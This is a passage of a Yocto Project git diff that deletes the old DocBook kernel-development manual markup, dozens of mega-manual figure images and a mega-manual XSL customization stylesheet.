- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Yocto Project Linux Kernel Development Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="kernel-dev-intro.xml"/>
-
- <xi:include href="kernel-dev-common.xml"/>
-
- <xi:include href="kernel-dev-advanced.xml"/>
-
- <xi:include href="kernel-dev-concepts-appx.xml"/>
-
- <xi:include href="kernel-dev-maint-appx.xml"/>
-
- <xi:include href="kernel-dev-faq.xml"/>
-
-<!-- <index id='index'>
- <title>Index</title>
- </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/mega-manual/figures/YP-flow-diagram.png b/documentation/mega-manual/figures/YP-flow-diagram.png
deleted file mode 100644
index 35969038c9..0000000000
--- a/documentation/mega-manual/figures/YP-flow-diagram.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/add-variable.png b/documentation/mega-manual/figures/add-variable.png
deleted file mode 100644
index 6bdcca705a..0000000000
--- a/documentation/mega-manual/figures/add-variable.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/analysis-for-package-splitting.png b/documentation/mega-manual/figures/analysis-for-package-splitting.png
deleted file mode 100644
index 0cb038666b..0000000000
--- a/documentation/mega-manual/figures/analysis-for-package-splitting.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bash-oecore.png b/documentation/mega-manual/figures/bash-oecore.png
deleted file mode 100644
index 801a5d911f..0000000000
--- a/documentation/mega-manual/figures/bash-oecore.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bb_multiconfig_files.png b/documentation/mega-manual/figures/bb_multiconfig_files.png
deleted file mode 100644
index 041f06403b..0000000000
--- a/documentation/mega-manual/figures/bb_multiconfig_files.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bitbake-build-flow.png b/documentation/mega-manual/figures/bitbake-build-flow.png
deleted file mode 100644
index eb95eb3da0..0000000000
--- a/documentation/mega-manual/figures/bitbake-build-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bitbake-title.png b/documentation/mega-manual/figures/bitbake-title.png
deleted file mode 100644
index cb290154da..0000000000
--- a/documentation/mega-manual/figures/bitbake-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bsp-dev-flow.png b/documentation/mega-manual/figures/bsp-dev-flow.png
deleted file mode 100644
index 2ca1fecada..0000000000
--- a/documentation/mega-manual/figures/bsp-dev-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bsp-title.png b/documentation/mega-manual/figures/bsp-title.png
deleted file mode 100644
index f624dd4f94..0000000000
--- a/documentation/mega-manual/figures/bsp-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/build-workspace-directory.png b/documentation/mega-manual/figures/build-workspace-directory.png
deleted file mode 100644
index 5387d33f03..0000000000
--- a/documentation/mega-manual/figures/build-workspace-directory.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/buildhistory-web.png b/documentation/mega-manual/figures/buildhistory-web.png
deleted file mode 100644
index f6db86c977..0000000000
--- a/documentation/mega-manual/figures/buildhistory-web.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/buildhistory.png b/documentation/mega-manual/figures/buildhistory.png
deleted file mode 100644
index bd5f8a4908..0000000000
--- a/documentation/mega-manual/figures/buildhistory.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/building-an-image.png b/documentation/mega-manual/figures/building-an-image.png
deleted file mode 100755
index 1fbea5ab00..0000000000
--- a/documentation/mega-manual/figures/building-an-image.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/bypqs-title.png b/documentation/mega-manual/figures/bypqs-title.png
deleted file mode 100644
index 9e0a5ce52e..0000000000
--- a/documentation/mega-manual/figures/bypqs-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/compatible-layers.png b/documentation/mega-manual/figures/compatible-layers.png
deleted file mode 100644
index 38436b075c..0000000000
--- a/documentation/mega-manual/figures/compatible-layers.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/concepts-manual-title.png b/documentation/mega-manual/figures/concepts-manual-title.png
deleted file mode 100644
index bac7a69994..0000000000
--- a/documentation/mega-manual/figures/concepts-manual-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/configuration-compile-autoreconf.png b/documentation/mega-manual/figures/configuration-compile-autoreconf.png
deleted file mode 100644
index 043d195a33..0000000000
--- a/documentation/mega-manual/figures/configuration-compile-autoreconf.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/cross-development-toolchains.png b/documentation/mega-manual/figures/cross-development-toolchains.png
deleted file mode 100644
index cbe8371c05..0000000000
--- a/documentation/mega-manual/figures/cross-development-toolchains.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/cute-files-npm-example.png b/documentation/mega-manual/figures/cute-files-npm-example.png
deleted file mode 100644
index 1ebe74f535..0000000000
--- a/documentation/mega-manual/figures/cute-files-npm-example.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/define-generic.png b/documentation/mega-manual/figures/define-generic.png
deleted file mode 100644
index bd22718a55..0000000000
--- a/documentation/mega-manual/figures/define-generic.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/dev-title.png b/documentation/mega-manual/figures/dev-title.png
deleted file mode 100644
index 15e67d0744..0000000000
--- a/documentation/mega-manual/figures/dev-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/git-workflow.png b/documentation/mega-manual/figures/git-workflow.png
deleted file mode 100644
index e401330a12..0000000000
--- a/documentation/mega-manual/figures/git-workflow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/hosted-service.png b/documentation/mega-manual/figures/hosted-service.png
deleted file mode 100644
index 01fea7b245..0000000000
--- a/documentation/mega-manual/figures/hosted-service.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/image-generation.png b/documentation/mega-manual/figures/image-generation.png
deleted file mode 100644
index aff9fc27e0..0000000000
--- a/documentation/mega-manual/figures/image-generation.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/images.png b/documentation/mega-manual/figures/images.png
deleted file mode 100644
index 20c01307d5..0000000000
--- a/documentation/mega-manual/figures/images.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/import-layer.png b/documentation/mega-manual/figures/import-layer.png
deleted file mode 100644
index 436ec7af4a..0000000000
--- a/documentation/mega-manual/figures/import-layer.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/index-downloads.png b/documentation/mega-manual/figures/index-downloads.png
deleted file mode 100755
index d8d4475cee..0000000000
--- a/documentation/mega-manual/figures/index-downloads.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-architecture-overview.png b/documentation/mega-manual/figures/kernel-architecture-overview.png
deleted file mode 100755
index 2aad172db3..0000000000
--- a/documentation/mega-manual/figures/kernel-architecture-overview.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-dev-flow.png b/documentation/mega-manual/figures/kernel-dev-flow.png
deleted file mode 100644
index 793a395e8f..0000000000
--- a/documentation/mega-manual/figures/kernel-dev-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-dev-title.png b/documentation/mega-manual/figures/kernel-dev-title.png
deleted file mode 100644
index 7a8dd54372..0000000000
--- a/documentation/mega-manual/figures/kernel-dev-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-overview-1.png b/documentation/mega-manual/figures/kernel-overview-1.png
deleted file mode 100644
index 116c0b9bd4..0000000000
--- a/documentation/mega-manual/figures/kernel-overview-1.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-overview-2-generic.png b/documentation/mega-manual/figures/kernel-overview-2-generic.png
deleted file mode 100644
index ee2cdb206b..0000000000
--- a/documentation/mega-manual/figures/kernel-overview-2-generic.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernel-title.png b/documentation/mega-manual/figures/kernel-title.png
deleted file mode 100644
index 59d86c00dc..0000000000
--- a/documentation/mega-manual/figures/kernel-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernelshark-all.png b/documentation/mega-manual/figures/kernelshark-all.png
deleted file mode 100644
index 99b40bafe5..0000000000
--- a/documentation/mega-manual/figures/kernelshark-all.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernelshark-choose-events.png b/documentation/mega-manual/figures/kernelshark-choose-events.png
deleted file mode 100644
index e8dd62a571..0000000000
--- a/documentation/mega-manual/figures/kernelshark-choose-events.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernelshark-i915-display.png b/documentation/mega-manual/figures/kernelshark-i915-display.png
deleted file mode 100644
index bb0edfb7fd..0000000000
--- a/documentation/mega-manual/figures/kernelshark-i915-display.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/kernelshark-output-display.png b/documentation/mega-manual/figures/kernelshark-output-display.png
deleted file mode 100644
index ae2d0e5730..0000000000
--- a/documentation/mega-manual/figures/kernelshark-output-display.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/key-dev-elements.png b/documentation/mega-manual/figures/key-dev-elements.png
deleted file mode 100644
index 76c44050fd..0000000000
--- a/documentation/mega-manual/figures/key-dev-elements.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/layer-input.png b/documentation/mega-manual/figures/layer-input.png
deleted file mode 100644
index 29b56f9ea1..0000000000
--- a/documentation/mega-manual/figures/layer-input.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/mega-title.png b/documentation/mega-manual/figures/mega-title.png
deleted file mode 100644
index cde0b89a44..0000000000
--- a/documentation/mega-manual/figures/mega-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/multiconfig_files.png b/documentation/mega-manual/figures/multiconfig_files.png
deleted file mode 100644
index 0b59338b3a..0000000000
--- a/documentation/mega-manual/figures/multiconfig_files.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/new-project.png b/documentation/mega-manual/figures/new-project.png
deleted file mode 100644
index dbc50b9918..0000000000
--- a/documentation/mega-manual/figures/new-project.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/oprofileui-busybox.png b/documentation/mega-manual/figures/oprofileui-busybox.png
deleted file mode 100644
index a8275c65d2..0000000000
--- a/documentation/mega-manual/figures/oprofileui-busybox.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/oprofileui-copy-to-user.png b/documentation/mega-manual/figures/oprofileui-copy-to-user.png
deleted file mode 100644
index deb6470204..0000000000
--- a/documentation/mega-manual/figures/oprofileui-copy-to-user.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/oprofileui-downloading.png b/documentation/mega-manual/figures/oprofileui-downloading.png
deleted file mode 100644
index 57742d6723..0000000000
--- a/documentation/mega-manual/figures/oprofileui-downloading.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/oprofileui-processes.png b/documentation/mega-manual/figures/oprofileui-processes.png
deleted file mode 100644
index ae547028f4..0000000000
--- a/documentation/mega-manual/figures/oprofileui-processes.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/overview-manual-title.png b/documentation/mega-manual/figures/overview-manual-title.png
deleted file mode 100644
index 41e9012c4f..0000000000
--- a/documentation/mega-manual/figures/overview-manual-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/package-feeds.png b/documentation/mega-manual/figures/package-feeds.png
deleted file mode 100755
index 2668d3ddaf..0000000000
--- a/documentation/mega-manual/figures/package-feeds.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/patching.png b/documentation/mega-manual/figures/patching.png
deleted file mode 100644
index 80fba7e7cf..0000000000
--- a/documentation/mega-manual/figures/patching.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-probe-do_fork-profile.png b/documentation/mega-manual/figures/perf-probe-do_fork-profile.png
deleted file mode 100644
index 1a1070deb8..0000000000
--- a/documentation/mega-manual/figures/perf-probe-do_fork-profile.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-report-cycles-u.png b/documentation/mega-manual/figures/perf-report-cycles-u.png
deleted file mode 100644
index 68ec6af80b..0000000000
--- a/documentation/mega-manual/figures/perf-report-cycles-u.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-systemwide-libc.png b/documentation/mega-manual/figures/perf-systemwide-libc.png
deleted file mode 100644
index 2b72869c77..0000000000
--- a/documentation/mega-manual/figures/perf-systemwide-libc.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-systemwide.png b/documentation/mega-manual/figures/perf-systemwide.png
deleted file mode 100644
index 12ce2444ae..0000000000
--- a/documentation/mega-manual/figures/perf-systemwide.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png b/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png
deleted file mode 100644
index ceb34eaead..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-annotate-menu.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png b/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png
deleted file mode 100644
index 3581e9daa6..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-annotate-udhcpc.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png b/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png
deleted file mode 100644
index c317b49a4e..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-debuginfo.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png b/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png
deleted file mode 100644
index 1913c867d0..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom-menu.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png b/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png
deleted file mode 100644
index a1962c437a..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-dso-zoom.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png
deleted file mode 100644
index b642d06c8b..0000000000
--- a/documentation/mega-manual/figures/perf-wget-busybox-expanded-stripped.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-flat-stripped.png b/documentation/mega-manual/figures/perf-wget-flat-stripped.png
deleted file mode 100644
index c8f395ab53..0000000000
--- a/documentation/mega-manual/figures/perf-wget-flat-stripped.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png
deleted file mode 100644
index bb7c764ce0..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-from-user-expanded-stripped.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
deleted file mode 100644
index a799af5127..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png
deleted file mode 100644
index e91808ae40..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped-unresolved-hidden.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png b/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png
deleted file mode 100644
index 812302d0a8..0000000000
--- a/documentation/mega-manual/figures/perf-wget-g-copy-to-user-expanded-stripped.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/poky-reference-distribution.png b/documentation/mega-manual/figures/poky-reference-distribution.png
deleted file mode 100644
index 1be89ae68e..0000000000
--- a/documentation/mega-manual/figures/poky-reference-distribution.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/poky-title.png b/documentation/mega-manual/figures/poky-title.png
deleted file mode 100644
index 2893d84620..0000000000
--- a/documentation/mega-manual/figures/poky-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/profile-title.png b/documentation/mega-manual/figures/profile-title.png
deleted file mode 100644
index ce5c682b58..0000000000
--- a/documentation/mega-manual/figures/profile-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png b/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png
deleted file mode 100644
index 2b6bfdacf9..0000000000
--- a/documentation/mega-manual/figures/pybootchartgui-linux-yocto.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png b/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png
deleted file mode 100644
index 444675c543..0000000000
--- a/documentation/mega-manual/figures/pychart-linux-yocto-rpm-nostrip.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png b/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png
deleted file mode 100644
index 8ee35352d8..0000000000
--- a/documentation/mega-manual/figures/pychart-linux-yocto-rpm.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/recipe-workflow.png b/documentation/mega-manual/figures/recipe-workflow.png
deleted file mode 100644
index c0e960b13b..0000000000
--- a/documentation/mega-manual/figures/recipe-workflow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sched-wakeup-profile.png b/documentation/mega-manual/figures/sched-wakeup-profile.png
deleted file mode 100644
index 2f25811889..0000000000
--- a/documentation/mega-manual/figures/sched-wakeup-profile.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-autotools-flow.png b/documentation/mega-manual/figures/sdk-autotools-flow.png
deleted file mode 100644
index ec6685f8b6..0000000000
--- a/documentation/mega-manual/figures/sdk-autotools-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-devtool-add-flow.png b/documentation/mega-manual/figures/sdk-devtool-add-flow.png
deleted file mode 100644
index e7d6173d2d..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-add-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-devtool-modify-flow.png b/documentation/mega-manual/figures/sdk-devtool-modify-flow.png
deleted file mode 100644
index 18ba8b7e65..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-modify-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png b/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png
deleted file mode 100644
index 7d4f395e24..0000000000
--- a/documentation/mega-manual/figures/sdk-devtool-upgrade-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-environment.png b/documentation/mega-manual/figures/sdk-environment.png
deleted file mode 100644
index 78b8cad39e..0000000000
--- a/documentation/mega-manual/figures/sdk-environment.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-generation.png b/documentation/mega-manual/figures/sdk-generation.png
deleted file mode 100644
index 939f839113..0000000000
--- a/documentation/mega-manual/figures/sdk-generation.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png b/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png
deleted file mode 100644
index b71c8ad73c..0000000000
--- a/documentation/mega-manual/figures/sdk-installed-extensible-sdk-directory.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png b/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png
deleted file mode 100644
index 45c0154b19..0000000000
--- a/documentation/mega-manual/figures/sdk-installed-standard-sdk-directory.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-makefile-flow.png b/documentation/mega-manual/figures/sdk-makefile-flow.png
deleted file mode 100644
index 0ccb4180a3..0000000000
--- a/documentation/mega-manual/figures/sdk-makefile-flow.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk-title.png b/documentation/mega-manual/figures/sdk-title.png
deleted file mode 100644
index e69e03935a..0000000000
--- a/documentation/mega-manual/figures/sdk-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sdk.png b/documentation/mega-manual/figures/sdk.png
deleted file mode 100644
index a376872638..0000000000
--- a/documentation/mega-manual/figures/sdk.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/set-variable.png b/documentation/mega-manual/figures/set-variable.png
deleted file mode 100644
index d36b52754e..0000000000
--- a/documentation/mega-manual/figures/set-variable.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/simple-configuration.png b/documentation/mega-manual/figures/simple-configuration.png
deleted file mode 100644
index e8fce2bf18..0000000000
--- a/documentation/mega-manual/figures/simple-configuration.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/source-fetching.png b/documentation/mega-manual/figures/source-fetching.png
deleted file mode 100644
index bf5e187b2b..0000000000
--- a/documentation/mega-manual/figures/source-fetching.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/source-input.png b/documentation/mega-manual/figures/source-input.png
deleted file mode 100644
index 6b6ba4b338..0000000000
--- a/documentation/mega-manual/figures/source-input.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/source-repos.png b/documentation/mega-manual/figures/source-repos.png
deleted file mode 100644
index e9cff16cc8..0000000000
--- a/documentation/mega-manual/figures/source-repos.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sysprof-callers.png b/documentation/mega-manual/figures/sysprof-callers.png
deleted file mode 100644
index 640c8d9140..0000000000
--- a/documentation/mega-manual/figures/sysprof-callers.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sysprof-copy-from-user.png b/documentation/mega-manual/figures/sysprof-copy-from-user.png
deleted file mode 100644
index 8d31427824..0000000000
--- a/documentation/mega-manual/figures/sysprof-copy-from-user.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/sysprof-copy-to-user.png b/documentation/mega-manual/figures/sysprof-copy-to-user.png
deleted file mode 100644
index 7a5bab7991..0000000000
--- a/documentation/mega-manual/figures/sysprof-copy-to-user.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/toaster-title.png b/documentation/mega-manual/figures/toaster-title.png
deleted file mode 100644
index b7ea39cd8d..0000000000
--- a/documentation/mega-manual/figures/toaster-title.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/user-configuration.png b/documentation/mega-manual/figures/user-configuration.png
deleted file mode 100644
index 142454715b..0000000000
--- a/documentation/mega-manual/figures/user-configuration.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/using-a-pre-built-image.png b/documentation/mega-manual/figures/using-a-pre-built-image.png
deleted file mode 100644
index b03130d123..0000000000
--- a/documentation/mega-manual/figures/using-a-pre-built-image.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/variable-added.png b/documentation/mega-manual/figures/variable-added.png
deleted file mode 100644
index 518f25fa15..0000000000
--- a/documentation/mega-manual/figures/variable-added.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/yocto-project-transp.png b/documentation/mega-manual/figures/yocto-project-transp.png
deleted file mode 100755
index 31d2b147fd..0000000000
--- a/documentation/mega-manual/figures/yocto-project-transp.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/figures/yp-download.png b/documentation/mega-manual/figures/yp-download.png
deleted file mode 100644
index bfd12b678a..0000000000
--- a/documentation/mega-manual/figures/yp-download.png
+++ /dev/null
Binary files differ
diff --git a/documentation/mega-manual/mega-manual-customization.xsl b/documentation/mega-manual/mega-manual-customization.xsl
deleted file mode 100644
index b52b5b2aa3..0000000000
--- a/documentation/mega-manual/mega-manual-customization.xsl
+++ /dev/null
@@ -1,42 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:param name="generate.toc">
- appendix toc
- chapter toc
- article nop
- book nop
- part nop
- preface nop
- qandadiv nop
- qandaset nop
- reference nop
- section nop
- set nop
- </xsl:param>
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
- <xsl:include href="../template/gloss-permalinks.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'mega-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel">A</xsl:param>
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/mega-manual/mega-manual.xml b/documentation/mega-manual/mega-manual.xml
